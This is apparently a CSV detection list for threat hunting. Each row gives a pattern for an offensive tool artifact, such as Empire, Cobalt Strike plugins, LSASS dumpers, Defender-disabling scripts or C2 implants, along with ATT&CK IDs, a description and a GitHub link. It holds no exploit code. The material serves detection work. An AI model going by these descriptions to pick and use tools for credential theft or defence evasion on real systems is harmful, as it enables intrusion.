T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*DecryptNextCharacterWinSCP*",".{0,1000}DecryptNextCharacterWinSCP.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*decryptteamviewer*",".{0,1000}decryptteamviewer.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*DecryptWinSCPPassword*",".{0,1000}DecryptWinSCPPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ded27a571bfbdf7f33a8582ba4d924604a825ed427c0e734d0b299328f2c544e*",".{0,1000}ded27a571bfbdf7f33a8582ba4d924604a825ed427c0e734d0b299328f2c544e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*DEED6795-9EC9-4B2C-95E0-9E465DA61755*",".{0,1000}DEED6795\-9EC9\-4B2C\-95E0\-9E465DA61755.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*deepce.sh -e *",".{0,1000}deepce\.sh\s\-e\s.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*DeEpinGh0st/Erebus*",".{0,1000}DeEpinGh0st\/Erebus.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1408","219","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*deepinstinct/ContainYourself*",".{0,1000}deepinstinct\/ContainYourself.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*deepinstinct/Lsass-Shtinkering*",".{0,1000}deepinstinct\/Lsass\-Shtinkering.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*deepinstinct/LsassSilentProcessExit*",".{0,1000}deepinstinct\/LsassSilentProcessExit.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","430","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" "*deepinstinct/NoFilter*",".{0,1000}deepinstinct\/NoFilter.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*deepsound2john.py*",".{0,1000}deepsound2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*deepzec*",".{0,1000}deepzec.{0,1000}","offensive_tool_keyword","Github Username","Github Author of malicious scripts and eploitaiton tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/deepzec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*def nemesis_post_data(*",".{0,1000}def\snemesis_post_data\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*def46f338013e516bbe3823ab661abb80e80e1388f2b57c3aa9dedee7f4735be*",".{0,1000}def46f338013e516bbe3823ab661abb80e80e1388f2b57c3aa9dedee7f4735be.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*defanger exclusion*",".{0,1000}defanger\sexclusion.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*defanger realtime*",".{0,1000}defanger\srealtime.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*defanger signature*",".{0,1000}defanger\ssignature.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*default_userpass_for_services_unhash*",".{0,1000}default_userpass_for_services_unhash.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*default_users_for_services_unhash.txt*",".{0,1000}default_users_for_services_unhash\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*DefaultBeaconApi*",".{0,1000}DefaultBeaconApi.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*DefaultCreds-cheat-sheet*",".{0,1000}DefaultCreds\-cheat\-sheet.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","5272","667","2024-04-29T16:57:49Z","2021-01-01T19:02:36Z" "*--defaults-torrc*",".{0,1000}\-\-defaults\-torrc.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*Defeat-Defender.bat*",".{0,1000}Defeat\-Defender\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*defeat-defender.py*",".{0,1000}defeat\-defender\.py.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*Defeat-Defender-V1.3.ahk*",".{0,1000}Defeat\-Defender\-V1\.3\.ahk.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*DefenderCheck*",".{0,1000}DefenderCheck.{0,1000}","offensive_tool_keyword","DefenderCheck","Quick tool to help make evasion work a little bit easier.Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on. and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.","T1027 - T1055 - T1562 - T1553","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/matterpreter/DefenderCheck","1","0","N/A","N/A","10","2133","364","2023-09-14T18:42:39Z","2019-04-09T14:03:46Z" "*DefenderCheck.exe*",".{0,1000}DefenderCheck\.exe.{0,1000}","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*DefenseEvasion_CodeSigning_PeSigningAuthHijack.py*",".{0,1000}DefenseEvasion_CodeSigning_PeSigningAuthHijack\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature.py*",".{0,1000}DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_CobaltStrikeOnline.py*",".{0,1000}DefenseEvasion_ProcessInjection_CobaltStrikeOnline\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_CsharpAssemblyLoader.py*",".{0,1000}DefenseEvasion_ProcessInjection_CsharpAssemblyLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_CsharpAssemblyLoaderPlus.py*",".{0,1000}DefenseEvasion_ProcessInjection_CsharpAssemblyLoaderPlus\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_ExampleModule.py*",".{0,1000}DefenseEvasion_ProcessInjection_ExampleModule\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_PeLoader.py*",".{0,1000}DefenseEvasion_ProcessInjection_PeLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_PowershellRunInMem.py*",".{0,1000}DefenseEvasion_ProcessInjection_PowershellRunInMem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_ProcessHandle.py*",".{0,1000}DefenseEvasion_ProcessInjection_ProcessHandle\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_PythonRunInMem.py*",".{0,1000}DefenseEvasion_ProcessInjection_PythonRunInMem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_SessionClone.py*",".{0,1000}DefenseEvasion_ProcessInjection_SessionClone\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_ShellcodeLoader.py*",".{0,1000}DefenseEvasion_ProcessInjection_ShellcodeLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_ProcessInjection_WindowsSystem.py*",".{0,1000}DefenseEvasion_ProcessInjection_WindowsSystem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*DefenseEvasion_SubvertTrustControls_CloneSSLPem.py*",".{0,1000}DefenseEvasion_SubvertTrustControls_CloneSSLPem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*define DHCP_KEY _T(""SYSTEM\\CurrentControlSet\\Services\\DHCPServer\\ServicePrivateData""*",".{0,1000}define\sDHCP_KEY\s_T\(\""SYSTEM\\\\CurrentControlSet\\\\Services\\\\DHCPServer\\\\ServicePrivateData\"".{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","content","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*DeimosC2*",".{0,1000}DeimosC2.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" 